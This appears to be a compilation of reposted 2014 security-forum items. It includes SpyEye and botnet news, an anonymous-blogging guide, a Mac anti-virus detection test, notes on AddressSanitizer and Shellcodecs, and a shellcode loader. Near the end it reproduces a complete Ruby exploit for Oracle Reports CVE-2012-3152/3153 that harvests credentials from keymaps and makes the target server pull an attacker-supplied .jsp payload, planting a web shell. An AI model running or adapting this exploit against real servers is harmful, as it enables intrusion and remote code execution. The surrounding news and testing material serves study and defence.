According to a Department of Justice press release, Russian national Aleksandr Andreevich Panin (who used the online handles "Gribodemon" and "Harderman") has now admitted his involvement.

"The apprehension of Mr. Panin means that one of the world's top developers of malicious software is no longer in a position to create computer programs that can victimize people around the world. Botnets such as SpyEye represent one of the most dangerous types of malicious software on the Internet today, which can steal people's identities and money from their bank accounts without their knowledge. The FBI will continue working with partners domestically and internationally to combat cyber-crime."

Between 2009 and 2011, Panin operated from his Russian base, conspiring with others to develop, market and sell versions of SpyEye to other online criminals. In all, Panin is thought to have sold the SpyEye malware kit to over 150 criminals. One of them, using the name "Soldier", is reported to have used SpyEye to earn more than $3.2 million in just six months.

Panin's cybercrime career came unstuck, however, when he took a holiday in the Dominican Republic last summer. Without formally extraditing him, local police threw him onto a plane to the United States, where he was arrested by federal agents. The nature of Panin's arrest raised controversy in Russia, where the foreign affairs ministry warned citizens who believed they might have charges raised against them to avoid travelling overseas.

Arrests at airports appear to have become a theme in the apprehension of the key individuals involved in the SpyEye malware case. Amongst Panin's alleged conspirators was Hamza Bendelladj, aka "Bx1", who smiled broadly as he was paraded before the media after his arrest at Bangkok's Suvarnabhumi airport in January 2013, as he was in transit from Malaysia to Egypt. Bendelladj was subsequently extradited to the United States, where charges against him are currently pending.

Sentencing for Panin is scheduled for April 29, 2014.

Source: SpyEye malware creator Aleksandr Panin pleads guilty
-
How to Start an Anonymous Blog
26 January 2014

Introduction

I believe that, thanks to the steps I outline in this post, no one will ever be able to reveal my identity. My domain may be seized and my blog can be closed, but I am confident that my identity will remain a mystery. I can say these things mainly because I believe in a very important tool called Tor. Developers and operators of Tor nodes work to ensure that anyone can be anonymous on the internet. Tor is a great pain to the NSA, and to any other organization or country that wants to spy on internet activity. The Tor network makes it very difficult to track down IP addresses, and domain registration is now available via Bitcoin, so I never needed to provide any personal information when setting up this blog.

Tools and Resources

- USB drive
- Tails OS
- Tor Network
- Local Bitcoins — buy Bitcoins for cash
- Free email accounts from outlook.com and anonymousspeech.com
- Domain name purchased from IT Itch
- Static site hosted on GitHub Pages

Tails / Tor

Tails is started from a USB disk, which also includes an encrypted partition. The encrypted partition holds a Bitcoin wallet, the blog source code and a Keepass database. My passwords for third-party services are randomly generated, and very strong. Tails makes it very hard to go wrong, because all network connections are forced through Tor. For example, to develop this blog locally, I must add some firewall rules to allow local connections on port 4000, download a different browser (Midori), and then tell it to skip using a proxy server. The firewall rules block all external requests in Midori, but I can access http://localhost:4000. So unless I do some nonsense like log in to StackOverflow using my real Google account and use the "untraceableblog" username, I believe it will be almost impossible to track me.

I make a backup of the USB flash drive on my primary computer and save it to a TrueCrypt hidden volume. I like the idea of hidden volumes; I feel like a fucking spy. The idea is that you can have a fake password that unlocks the fake encrypted folder, and a real password that unlocks the real encrypted folder, and there is absolutely no way to know which one you unlocked. In my fake encrypted folder, I keep my personal Keepass database, credit cards, and scans of my passport and driving license. So if someone forces me to enter my password to unlock my computer, and finds what they believe is a TrueCrypt volume, there is no way of knowing whether I entered the real or the fake password. This feature provides at least a little protection from "wrench attacks": XKCD: wrench attacks

Most of the time I hide the stick in a secret location in the house. When I need to go somewhere and want to be able to update this blog, I'll back it up to the hidden volume and then securely erase the USB disk, so I can take it with me without fear. This is what I must do until Tails adds its own support for hidden volumes.

E-mail

I signed up for a free email account from Outlook.com, and used an anonymousspeech.com account for verification and backup. I tried Gmail first, but Google makes it very difficult to sign up for accounts when you use Tor, because they require phone verification. This is fair enough, because people like to create a huge number of fake Gmail accounts to send spam.

Blog

This blog is hosted for free on GitHub Pages. It uses Octopress to create a static site, and I installed the Page Turner theme. I push to GitHub with an SSH key, which is, of course, encrypted and stored on my USB stick.
I can think of two vectors that could give away information about my identity:

Message Timestamps

The Tails operating system has a good policy of forcing the system time to always be UTC. But if I wrote a series of blog posts in the coming years, you could maybe analyze the timestamps to determine my time zone. However, the compiled site shows only the date. Also, I travel a lot. (Or do I?)

Word and character frequency analysis

You may be able to find out my country of origin or identity from my words and phrases. You might even be able to find a match with other content that I posted online under my real identity. I counter this by running all my posts through Google Translate. I translate into another language, then back to English, and then correct the errors. It's great for mixing up my vocabulary, but I wish it didn't fuck up Markdown and HTML so much. Until this point, you might have assumed that English was my second language. But let me assure you, I will neither confirm nor deny it. One problem is that Google can see my original messages, and the NSA can probably see them too. If I wanted to avoid that, I could post some anonymous translation jobs and pay the translators via Bitcoin.

Analytics

See the email section for reasons why Google Analytics was unavailable. I signed up for StatCounter instead. But even if Google Analytics were available, I wouldn't use a tracking ID linked to my real identity. Many anonymous bloggers have been busted by Google's Reverse ID Lookup tool.

Buying Bitcoins with maximum anonymity

I bought the Bitcoins from LocalBitcoins, using an anonymous account that I set up over Tor. I found a seller who was willing to meet in person, and we agreed on a time and place. We met, I gave them money, and they released the Bitcoins from escrow using their phone.

Buying a domain name with Bitcoins

IT Itch is a domain registrar that accepts payments via BitPay. Their domains are quite expensive at $15 USD each, but worth it for completely anonymous registration. This was an easy process, but it took a long time for the domain to become active (over an hour). Once it had been activated, I configured the DNS records for GitHub Pages, and then my blog was live at Untraceable. One thing that IT Itch did terribly wrong was to e-mail me my password in plain text after I signed up. NO GOOD! If someone got access to my Outlook email, they could have signed in and ruined my domain. So I deleted the message and changed my password, and luckily they did not email me a new password.

How I could get busted, Part One

Tracing the Bitcoins

In theory, you could follow the trail of Bitcoin transactions and discover my identity. However, in this case, it is very unlikely that even the most sophisticated and well-funded organizations would be able to find me. See, I bought these Bitcoins using an anonymous account on localbitcoins.com (created using Tor). The seller and I agreed on the spot to meet in person, and I paid cash. To reveal my identity, you would need to break or work for every service that I used. Like this:

1) Get access to the ititch.com database, and find the BitPay transaction identifier for untraceableblog.com.
2) Get access to the BitPay database, and find the Bitcoin address that sent Bitcoins for this transaction.
3) Get access to the localbitcoins.com database. Find the Bitcoin address which sent the coins to BitPay, and trace the transactions back until you find a localbitcoins escrow address.
4) From the escrow address, you might be able to find the localbitcoins accounts, and then you can read the messages that we exchanged about meeting up.
5) You would need to visit this location, and hope that there are some surveillance cameras that might have captured us on the day.
6) You'd finally need access to the security company that holds the security camera footage archives, get a clear picture of my face, and somehow run a facial recognition scan to find my identity. Working for Facebook or the NSA may help if you get that far.

How I could get busted, Part Two

Everything is hacked. All of it. The Internet is a machine based on trust, and there are many ways that this trust can be broken. Someone may be able to generate trusted SSL certificates for any domain, demand that ISPs route all traffic through them, or control a huge number of Tor nodes and perform traffic analysis attacks. I will not go into details, but if you're interested, you can read more about Tor attacks: How NSA attacks Tor / Firefox users with quantum and FOXACID; articles about attacks on the Tor blog.

Conclusion

This blog was just a fun exercise in anonymity, although I might use it to post some things in the future. I am just using the tools built by people much smarter than me, and I'm certainly not the first anonymous blogger, but I hope you learned something new. Of course, the rabbit hole can go much deeper than this. I could have hosted this blog on a VPS that I rented with Bitcoins, and set up the server as a Tor hidden service. The server's IP address would be fully protected, but then you could have only read the blog by connecting to the Tor network, and onion links just don't make it to the front page. I could have also done all my activities from a coffee shop, just in case Tor was compromised, but I couldn't be fucked. Finally, I could have chosen an ".se" domain if I was scared about U.S. government intervention. That's what The Pirate Bay is using now, and the Swedes are just letting them do their thing.

Please feel free to send me some spare Satoshis if you enjoyed the post: 146g3vSB64KxxnjWbb2vnjeaom6WYevcQb. And if you can find me, I'll be very impressed.

Source: Untraceable
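As an aside on the timestamp concern raised earlier in the post, here is roughly what the analysis an adversary might run could look like in Python; the sample timestamps are invented, and the point is simply that a histogram of posting hours hints at a time zone.

from collections import Counter
from datetime import datetime

# Full post timestamps in UTC, as Tails enforces (made-up sample data).
post_times_utc = [
    "2014-01-26 02:13", "2014-01-29 03:40", "2014-02-02 01:55",
    "2014-02-10 23:20", "2014-02-15 02:05",
]

hours = Counter(datetime.strptime(t, "%Y-%m-%d %H:%M").hour for t in post_times_utc)

for hour in range(24):
    print(f"{hour:02d}:00  {'#' * hours.get(hour, 0)}")
# A cluster of activity around 01:00-04:00 UTC suggests an author whose local
# evening falls there -- one reason the compiled blog publishes dates only.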
-
Mac anti-virus testing 2014
Posted on January 27th, 2014 at 8:49 AM EST

Almost exactly one year ago, I completed a round of tests of 20 different anti-virus programs on the Mac. Because this is an area of software that is in almost constant flux, I felt it was important to repeat that test this year. I was very curious about whether these programs were still as effective (or ineffective) as they had been, and how well they detected new malware that had appeared since the last test was performed. After last year's testing, I received a number of requests for tests of other apps. This year's testing sees a change in some of the apps being tested. Four new apps were added, while two were removed from testing (one simply because it was redundant). The malware samples used also went through a change. Some samples were removed, in an attempt to remove any that might have been deemed questionable, while others were added. Multiple samples of each of nine new malicious programs, which did not exist at the time of last year's testing, were included.

Scope

As with last year, it's important to understand the scope of this testing. This test is a measure only of the detection of specific malware samples when performing a manual scan. It makes no attempt to quantify the performance or stability of the various anti-virus apps, or to compare feature sets, or to identify how well an anti-virus app would block an active infection attempt. In a way, this test is merely a probe to see what items are included in the database of signatures recognized by each anti-virus app. The success of an app in this testing should not be taken as endorsement of that app, and in fact, some apps that performed well appear to have anecdotal problems that frequently appear in online forums. It is also important to understand small variations in the numbers. Some of the software that was tested varied from each other, or from last year's testing, by only a couple percentage points. It's important to understand that such a variation is not significant. A 98% and a 97%, or a 60% and a 59%, should be considered identical, for all intents and purposes.

Methods

Testing methodology was mostly the same as last year. A group of 188 samples, from 39 different malware families, was used for testing. Any samples that were not already present in the VirusTotal database were uploaded to VirusTotal, so that the samples would be available to the anti-virus community. The SHA1 checksum of each sample is included in the data, to allow those with access to VirusTotal to download the samples used and replicate my tests. Where possible, the full, original malware was included in testing. In many cases, such a sample will be found within a .zip or .dmg archive on VirusTotal, but such samples were not included in that form. All items were removed from their archives, and the archives were discarded, in order to put all anti-virus engines on a level playing field. (Some will check inside such archives and some will not.) In a number of cases, I have not been able to obtain full copies of the malware, but included executable components and the like. Testing was done in virtual machines in Parallels Desktop 9.0.24172.951362. I started with a virtual machine (VM) that consisted of a clean Mac OS X 10.9.1 installation, with Chrome and Firefox also installed. A snapshot of this system was made, and then this VM was used as the basis for all testing.
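Not part of the original write-up: a short Python sketch of how the per-sample SHA1 checksums mentioned above can be generated, so that a local sample set can be matched against the published data and VirusTotal. The folder name is a placeholder.

import hashlib
from pathlib import Path

def sha1_of_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large samples don't need to fit in memory."""
    digest = hashlib.sha1()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def hash_sample_folder(folder):
    for sample in sorted(Path(folder).iterdir()):
        if sample.is_file():
            print(f"{sha1_of_file(sample)}  {sample.name}")

if __name__ == "__main__":
    hash_sample_folder("malware_samples")   # placeholder folder name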
I installed each anti-virus app (engine) in that VM, saved a snapshot, reverted to the original base VM and repeated. Once installations were done, I ran each VM and updated the virus definitions in each anti-virus app (where possible), then saved another snapshot of this state and deleted the previous one. The end result was a series of VMs, each containing a fully up-to-date anti-virus app, frozen at some time on January 16. After that point, testing began. Testing took multiple days, but with the network connection cut off, the clock in the virtual system remained set to January 16, shortly after the anti-virus software was updated, and further background updates were not possible. Malware was copied onto the system inside an encrypted .zip file (to prevent accidental detection), which was then expanded into a folder full of samples. Each anti-virus app had any real-time or on-access scanning disabled, to prevent premature detection of malware. If an error was made, and malware was detected and quarantined in the process of expanding the archive, the VM was reset, settings in the anti-virus app were changed, and the process repeated. Once the malware was in place, scans commenced. Each app was used to scan that folder, or if custom scans were not allowed, a scan was done that would include the test user’s home folder, where the malware samples resided. Results were collected, in most cases in a very inconvenient manner. A few of the anti-virus apps allowed me to save or retrieve a log that contained information about what was detected, but most did not. In most cases, I was only able to capture the data by paging through a list of detected malware and taking a series of screenshots. Once collection of the data was done, a post-scan snapshot of the VM was saved, so that the results could be reviewed later as necessary. After the data was collected, the painstaking process of tabulating it began. Data was entered in a Numbers spreadsheet. A great deal of care was taken to ensure that no errors were made, but when tabulating data of this nature (trying to match up 64-digit hexadecimal numbers), it is entirely possible that transcription errors ended up in the data. Any errors brought to my attention will be immediately corrected. Data The complete data can be downloaded as either a Numbers spreadsheet or a PDF file. (An Excel file was not provided because some of the formatting that made the data more readable did not make the conversion well.) Detection rates (defined as the percentage of samples that were detected) varied widely, from 98% down to 0%. Only 9 anti-virus engines tested performed at 91% or better, and around 2/3 of the engines got a “passing grade” (72% and up). Nine performed at 60% or lower. Five did so poorly – between 12% and no detections at all – that I would consider them to be scams. [TABLE=class: alternatingRows, width: 100%] [TR] [TD][/TD] [TD]Samples detected[/TD] [TD]Percentage detected[/TD] [/TR] [TR] [TD]VirusBarrier 10.7.8 (772)[/TD] [TD]187[/TD] [TD]99%[/TD] [/TR] [TR] [TD]avast! Free Antivirus 8.0 (40005)[/TD] [TD]184[/TD] [TD]98%[/TD] [/TR] [TR] [TD]ESET Cybersecurity 5.0.115.0[/TD] [TD]182[/TD] [TD]97%[/TD] [/TR] [TR] [TD]Sophos Anti-Virus for Mac 9.0.6[/TD] [TD]182[/TD] [TD]97%[/TD] [/TR] [TR] [TD]Avira Mac Security 2.0.1.105[/TD] [TD]181[/TD] [TD]96%[/TD] [/TR] [TR] [TD]F-Secure Anti-virus for Mac 0.1.?[/TD] [TD]181[/TD] [TD]96%[/TD] [/TR] [TR] [TD]Dr. 
Web Light 6.0.6 (201207050)*[/TD] [TD]179[/TD] [TD]95%[/TD] [/TR] [TR] [TD]Kaspersky Security 14.0.1.46[/TD] [TD]177[/TD] [TD]94%[/TD] [/TR] [TR] [TD]Comodo Antivirus 1.1.214829.106*[/TD] [TD]172[/TD] [TD]91%[/TD] [/TR] [TR] [TD]WebRoot SecureAnywhere 8.0.5.82: 134[/TD] [TD]162[/TD] [TD]86%[/TD] [/TR] [TR] [TD]Norton Anti-Virus 12.6 (26)[/TD] [TD]158[/TD] [TD]84%[/TD] [/TR] [TR] [TD]BitDefender 2.21 (2.21.4959)*[/TD] [TD]143[/TD] [TD]76%[/TD] [/TR] [TR] [TD]ClamXav 2.6.1 (304)[/TD] [TD]136[/TD] [TD]72%[/TD] [/TR] [TR] [TD]AVG AntiVirus 14.0 (4172)[/TD] [TD]115[/TD] [TD]61%[/TD] [/TR] [TR] [TD]Trend Micro Titanium 2.0.1279[/TD] [TD]112[/TD] [TD]60%[/TD] [/TR] [TR] [TD]ProtectMac 1.4[/TD] [TD]107[/TD] [TD]57%[/TD] [/TR] [TR] [TD]McAfee Endpoint Protection for Mac 2.1.0 (1085)[/TD] [TD]99[/TD] [TD]53%[/TD] [/TR] [TR] [TD]FortiClient 5.0.7.135[/TD] [TD]22[/TD] [TD]12%[/TD] [/TR] [TR] [TD]iAntivirus 1.1.4 (282)[/TD] [TD]19[/TD] [TD]10%[/TD] [/TR] [TR] [TD]MacScan 2.9.4*[/TD] [TD]4[/TD] [TD]2%[/TD] [/TR] [TR] [TD]Magician Anti-Trojan 1.4.8[/TD] [TD]1[/TD] [TD]1%[/TD] [/TR] [TR] [TD]MaxSecureAntivirus 1.0.1 (1.0.1)[/TD] [TD]0[/TD] [TD]0%[/TD] [/TR] [/TABLE] (* The version of anti-virus apps marked with an asterisk did not change since last year’s testing, though of course this has no bearing on signature database updates.) Last year, detections were broken down into active and inactive malware. I decided not to do that this year, as in some cases, the decision about whether to identify a particular piece of malware as active or inactive is difficult to make. Instead, I listed the year the malware family first appeared, and sorted the results by that year. In general, most malware that appeared in 2011 and earlier is inactive at this point, while a significant portion of malware newer than that is probably still active. Exploit.OSX.Safari Detection rates of each sample varied widely, with an average of 14 engines detecting each sample. One sample was detected by only 6 anti-virus engines, and three samples (all copies of Exploit.OSX.Safari) were only detected by one engine. These were included nonetheless because I know that they are malware. Strangely, in the case of the three Exploit.OSX.Safari samples, the malware is detected at a much greater rate when a .zip file containing the sample is scanned! The rate drops off to almost zero when the actual malicious file itself – a shell script disguised as a QuickTime movie – is scanned, both in my own testing and on VirusTotal. Conclusions Although it is important to keep in mind that this is only one measure of the quality of each of the tested anti-virus engines, it is not an unimportant one. Obviously, although it is not feasible for any anti-virus software to detect 100% of all malware, a good engine should be capable of coming as close to that number as possible. This is especially true in the Mac world, where the limited number of malware families means that detection rates of very close to 100% should be possible. As expected, some engines did indeed perform to that standard. Other engines did not fare so well. However, it is important to keep in mind that Mac OS X already does an admirable job of protecting against malware. At this time, there is no known malware capable of infecting a Mac running a properly-updated version of Mac OS X 10.6 or later, with all security settings left at the default (at a minimum). 
The role of anti-virus software must be taken into consideration, and some compromises in detection rate may be desirable to get desired behavior (or avoid bad behavior). Someone who wants a low-impact engine for scanning e-mail messages for Windows viruses will have very different needs than someone who needs to protect a computer from an irresponsible teenager who will download and install anything that catches his/her attention. It should also be noted that this test says nothing whatsoever about detection rates of Windows or Android malware. An engine that performs well against Mac malware may do quite poorly on malware for other systems, and likewise, one that does poorly with Mac malware may be very good with other malware. If your primary goal is to use anti-virus software to catch malware for other systems, so as to avoid passing it on, then this testing is not particularly relevant. When choosing anti-virus software, always take the full set of features into account, as well as seeking out community feedback regarding stability and performance. Be sure that you know how to uninstall the software before installing it, in case it causes problems and needs to be removed. If you should need to remove anti-virus software, always use the uninstaller provided with the software. Do not use generalized uninstall apps that claim to be able to find and remove all components of any application; such apps are unreliable. For more on the topic of protecting your Mac against malware, see my Mac Malware Guide. Objections There are a few objections that some may have with this test, so allow me to address them in advance. First, some will object that this is a rather artificial test, and not a real-world one. Although it would obviously be better to test by trying to infect a system with a variety of malware and determining whether each anti-virus software would block the infection, this is impractical. Not only would it be exceedingly time consuming with only a few samples, but it would be fairly meaningless as well, since Mac OS X is currently able to block all known malware through a variety of methods. Testing with static samples may be less informative, but it does give valuable information about the completeness of each engine’s virus definitions database. The sample size has improved significantly since earlier testing, consisting of 188 samples. Of course, this is still a very small sample size compared to Windows anti-virus testing, in which case many hundreds or thousands of samples would be used. Of course, taking into consideration the fact that there are millions of malware samples to be had in the Windows world, and very few in the Mac world, 188 samples is probably a more statistically significant number than what is used for most Windows-based tests. My opinion is that the samples used are a pretty good selection of Mac malware. A few of the engines tested appear to be enterprise-oriented programs. (In other words, they are aimed at being installed on large numbers of computers by large companies.) I chose to include these anyway, even though some people object to comparison of enterprise- and consumer-level anti-virus products. 
There are a number of end users who may be using one of these enterprise products on a company machine and who are curious how well it detects Mac malware. It is also important to keep in mind that these tests do not represent a direct comparison between the engines being tested, but rather a test against a particular standard: which samples are and are not detected.

Finally, some may object to the fact that more than half of the samples are what would be considered "extinct" malware, since such samples are no longer a real threat to anyone. However, information about what malware has been detected historically by an anti-virus engine is important for predicting future accuracy. In fact, looking at the data, there is no apparent increase in detection rate with newer malware. There's also the fact that some people may be looking for anti-virus software for old, legacy systems that may have malware infections from years past still in place. After all, Intego recently revealed that there are still at least 22,000 Macs infected with the extinct Flashback malware.

Anti-virus Engine Notes

There were a number of important or interesting points to make about specific anti-virus engines.

AVG had no way that I could determine to manually update its malware signatures. I simply allowed the VM containing AVG to run unattended for a while on January 16th, in an attempt to ensure the signatures were up to date. However, since there also is no apparent way to get information about the version of the signature database, I'm uncertain as to whether this strategy was successful.

The author of ClamXav is temporarily unable to add malware signatures to the official ClamAV signature database, but is working on a version of ClamXav that can download Mac-specific signatures separately. Once this is done, ClamXav detections should be able to get back on track again.

Comodo's installer was identified as being from an unidentified developer, due to not being code signed with a valid Apple Developer ID, and thus was blocked by Gatekeeper. This is a very serious failing on the part of a security app, in my opinion. I was forced to bypass Gatekeeper in order to install the program.

iAntivirus apparently does not feature any kind of mechanism for updating its definitions. (This is confirmed by a Symantec employee in the Norton forums.) I am unsure of the exact age of the current version of iAntivirus (version 1.1.4), but the comments people have made about this version in the Mac App Store date back to April 15, 2013, meaning that the malware signatures are at a minimum nine months old!

MacKeeper was removed from testing. It is an app that I actively recommend against using, but its anti-virus "back end" is an engine that performs well in my testing. I did not want to seem to give legitimacy to the program when I am strongly opposed to its use.

Magician is an app very similar to MacKeeper, and appears to be of similar quality, since it detected only one single sample. I strongly advise against its use in any capacity.

MaxSecureAntivirus detected absolutely none of the samples. It was the only app I was forced to purchase (for $10) in order to test. Apple has given me a refund, and is reviewing the app at this time. It is my hope that it is removed from the App Store, as it is a complete and utter scam, in my opinion.

Norton's performance was absolutely abysmal, even considering the limited performance capabilities of the VM it was running in.
Nearly every action, including mounting a USB flash drive containing the malware in the Finder, took far longer than it did with any of the other VMs used in testing.

VirusBarrier Express was removed from testing due to redundancy. It should have the same detections as VirusBarrier, so I chose not to test it.

Updates

January 28, 2014: 5 samples were inadvertently included as .jar archive files. These files were decompressed and re-scanned with all engines that missed them the first time around. There were very few changes; only the VirusBarrier, AVG and iAntivirus results changed. Revision 2 of the data files is now available at the original links given in the Data section.

Sursa: The Safe Mac
-
Shellcodecs is a collection of shellcode, loaders, sources, and generators provided with documentation designed to ease the exploitation and shellcode programming process.

Contents
1 Dependencies
2 Contents
3 Download shellcodecs
4 Building the code
5 Using the tools
5.1 Generators
5.1.1 Standard shellcode generator
5.1.2 Socket re-use shellcode generator
5.2 Loaders
6 Getting help
7 Credits

Dependencies
In order to run these shellcodes, the following dependencies are required:
- Linux
- GCC
- Python 2.7 (required by the generators)
- Automake

Unless otherwise noted, code is amd64. There are various 32-bit examples as well. If you think you may have an out-of-date version, or that the official version is out of sync with the site, the latest sources will be available 100% of the time in the shellcode appendix.

Link: Shellcodecs - Security101 - Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools
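For readers unfamiliar with what a "loader" in such a collection does, here is a minimal sketch of my own (not code from the Shellcodecs package): it places shellcode bytes into executable memory and jumps to them. It assumes Linux and GCC, as listed in the dependencies above, and uses a placeholder byte in place of real shellcode.

/* Minimal shellcode loader sketch (illustration only, not from Shellcodecs).
 * Assumes Linux + GCC. The placeholder "shellcode" is a single RET so the
 * program simply returns; replace it with real shellcode bytes to test. */
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

static const unsigned char shellcode[] = { 0xc3 };   /* placeholder: RET */

int main(void)
{
    /* Allocate a page that is readable, writable and executable. */
    void *mem = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    /* Copy the shellcode into the executable page and call it. */
    memcpy(mem, shellcode, sizeof(shellcode));
    ((void (*)(void))mem)();

    return 0;
}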
-
AddressSanitizer: a fast memory error detector
Updated Oct 16, 2013 by samso...@google.com

Contents
Introduction
Getting AddressSanitizer
Using AddressSanitizer
Interaction with other tools (gdb, ulimit -v)
Flags
Call stack
Incompatibility
Turning off instrumentation
FAQ
Comments?

New: AddressSanitizer is released as part of LLVM 3.1.
New: Watch the presentation from the LLVM Developer's Meeting (Nov 18, 2011); slides are also available.
New: Read the USENIX ATC '2012 paper.

Introduction
AddressSanitizer (aka ASan) is a memory error detector for C/C++. It finds:
- Use after free (dangling pointer dereference)
- Heap buffer overflow
- Stack buffer overflow
- Global buffer overflow
- Use after return
- Initialization order bugs

This tool is very fast. The average slowdown of the instrumented program is ~2x (see PerformanceNumbers). The tool consists of a compiler instrumentation module (currently, an LLVM pass) and a run-time library which replaces the malloc function. The tool works on x86 Linux and Mac.

See also: AddressSanitizerAlgorithm (if you are curious how it works), ComparisonOfMemoryTools.

Sursa: https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer
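As a quick illustration (my own example, not taken from the wiki page), here is a deliberate heap buffer overflow of the kind ASan reports at runtime. The compile line assumes a reasonably recent clang build with ASan support, which accepts the -fsanitize=address flag.

/* heap_overflow.c - a deliberate heap-buffer-overflow for ASan to catch.
 * Build and run (assuming a clang with ASan support):
 *   clang -g -fsanitize=address heap_overflow.c -o heap_overflow && ./heap_overflow
 * ASan aborts the program and prints a heap-buffer-overflow report pointing
 * at the offending line. */
#include <stdlib.h>

int main(void)
{
    int *array = malloc(10 * sizeof(int));
    array[10] = 42;   /* writes one element past the end of the allocation */
    free(array);
    return 0;
}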
-
Android bootkit malware infects more than 350,000 Android devices
Graham Cluley | January 29, 2014 8:46 am

Experts at Russian security firm Dr Web have issued a warning about a dangerous Trojan horse affecting more than 350,000 Android users. What makes this malware attack unusual is that it is designed to reinstall itself after you reboot your Android device, reinfecting the system even if you have deleted all of its working components.

Dr Web has dubbed the malware Android.Oldboot, and reports that it can download, install and remove applications on infected Android devices, opening opportunities for hackers to gain control of, and make money from, the hundreds of thousands of Android devices already infected. According to the researchers, the devices most at risk are those which have been reflashed with modified firmware (it's not unusual for Android owners to root their devices and install customised versions of the operating system onto their smartphones):

Reflashing a device with modified firmware that contains the routines required for the Trojan's operation is the most likely way this threat is introduced.

Over 90% of the infected devices identified by the Dr Web researchers are based in China (the malware's apparent target), but there are also reports of infections amongst Android users in Spain, Italy, Germany, Russia, Brazil, the United States and some South East Asian countries.

Android malware is a growing problem, and as more criminals try to earn money by exploiting Android devices we can expect to see more and more sophisticated attacks. Clearly it's important for Android users who are reflashing and rooting their devices to exercise caution over where they download their homebrewed alternative versions of the operating system, as it's possible they could be harbouring malware.

And realise this: if you're not yet running anti-virus software on your Android device, you are playing an increasingly dangerous game.

Sursa: Android bootkit malware infects more than 350,000 Android devices
-
Java-based malware driving DDoS botnet infects Windows, Mac, Linux devices
Multi-platform threat exploits old Java flaw, gains persistence.
by Dan Goodin - Jan 28 2014, 6:00pm EST

Researchers have uncovered a piece of botnet malware that is capable of infecting computers running Windows, Mac OS X, and Linux that have Oracle's Java software framework installed.

The cross-platform HEUR Backdoor.Java.Agent.a, as reported in a blog post published Tuesday by Kaspersky Lab, takes hold of computers by exploiting CVE-2013-2465, a critical Java vulnerability that Oracle patched in June. The security bug is present in Java 7 u21 and earlier. Once the bot has infected a computer, it copies itself to the autostart directory of its respective platform to ensure it runs whenever the machine is turned on. Compromised computers then report to an Internet relay chat channel that acts as a command and control server.

The botnet is designed to conduct distributed denial-of-service attacks on targets of the attackers' choice. Commands issued in the IRC channel allow the attackers to specify the IP address, port number, intensity, and duration of attacks. The malware is written entirely in Java, allowing it to run on Windows, OS X, and Linux machines. For added flexibility, the bot incorporates PircBot, an IRC programming interface based on Java.

The malware also uses the Zelix Klassmaster obfuscator to prevent it from being reverse engineered by whitehat and competing blackhat hackers. Besides obfuscating bytecode, Zelix encrypts some of the inner workings of the malware.

Sursa: Java-based malware driving DDoS botnet infects Windows, Mac, Linux devices | Ars Technica
-
Automated exploit for CVE-2012-3152 / CVE-2012-3153 by Mekanismen

#!/usr/bin/env ruby
require 'uri'
require 'open-uri'
require 'openssl'
#OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE

def upload_payload(dest)
  url = "#{@url}/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/#{dest}/images/#{@payload_name}+JOBTYPE=rwurl+URLPARAMETER='#{@payload_url}'"
  #print url
  begin
    uri = URI.parse(url)
    html = uri.open.read
  rescue
    html = ""
  end

  if html =~ /Successfully run/
    @hacked = true
    print "[+] Payload uploaded!\n"
  else
    print "[-] Payload upload failed\n"
  end
end

def getenv(server, authid)
  print "[+] Found server: #{server}\n"
  print "[+] Found credentials: #{authid}\n"
  print " [*] Querying showenv ... \n"

  begin
    uri = URI.parse("#{@url}/reports/rwservlet/showenv?server=#{server}&authid=#{authid}")
    html = uri.open.read
  rescue
    html = ""
  end

  if html =~ /\/(.*)\/showenv/
    print "[+] Query succeeded, uploading payload ... \n"
    upload_payload($1)
  else
    print "[-] Query failed... \n"
  end
end

@payload_url = ""   #the url that holds our payload (we can execute .jsp on the server)
@url = ""           #url to compromise
@hacked = false
@payload_name = (0...8).map { ('a'..'z').to_a[rand(26)] }.join + ".jsp"

print " [*] PWNACLE Fusion - Mekanismen <mattias@gotroot.eu>\n"
print " [*] Automated exploit for CVE-2012-3152 / CVE-2012-3153\n"
print " [*] Credits to: @miss_sudo\n"

unless ARGV[0] and ARGV[1]
  print "[-] Usage: ./pwnacle.rb target_url payload_url\n"
  exit
end

@url = ARGV[0]
@payload_url = ARGV[1]

print " [*] Target URL: #{@url}\n"
print " [*] Payload URL: #{@payload_url}\n"
print " [*] Payload name: #{@payload_name}\n"

begin
  #Can we view keymaps?
  uri = URI.parse("#{@url}/reports/rwservlet/showmap")
  html = uri.open.read
rescue
  print "[-] URL not vulnerable or unreachable\n"
  exit
end

test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten

#Parse keymaps for servers
print " [*] Enumerating keymaps ... \n"

test.each do |t|
  if not @hacked
    t = t.delete(' ')
    url = "#{@url}/reports/rwservlet/parsequery?#{t}"

    begin
      uri = URI.parse(url)
      html = uri.open.read
    rescue
    end

    #to automate exploitation we need to query showenv for a local path
    #we need a server id and creds for this, we enumerate the keymaps and hope for the best
    #showenv tells us the local PATH of /reports/ where we upload the shell
    #so we can reach it from /reports/images/<shell>.jsp
    if html =~ /userid=(.*)@/
      authid = $1
    end

    if html =~ /server=(\S*)/
      server = $1
    end

    if server and authid
      getenv(server, authid)
    end
  else
    break
  end
end

if @hacked
  print " [*] Server hopefully compromised!\n"
  print " [*] Payload url: #{@url}/reports/images/#{@payload_name}\n"
else
  print " [*] Enumeration done ... no vulnerable keymaps for automatic exploitation found \n"
  #server is still vulnerable but cannot be automatically exploited ... i guess
end

Sursa: https://github.com/Mekanismen/pwnacle-fusion/blob/master/pwnacle.rb
-
NEUREVT Bot Analysis
by Zhongchun Huo | January 29, 2014
This article originally appeared in Virus Bulletin

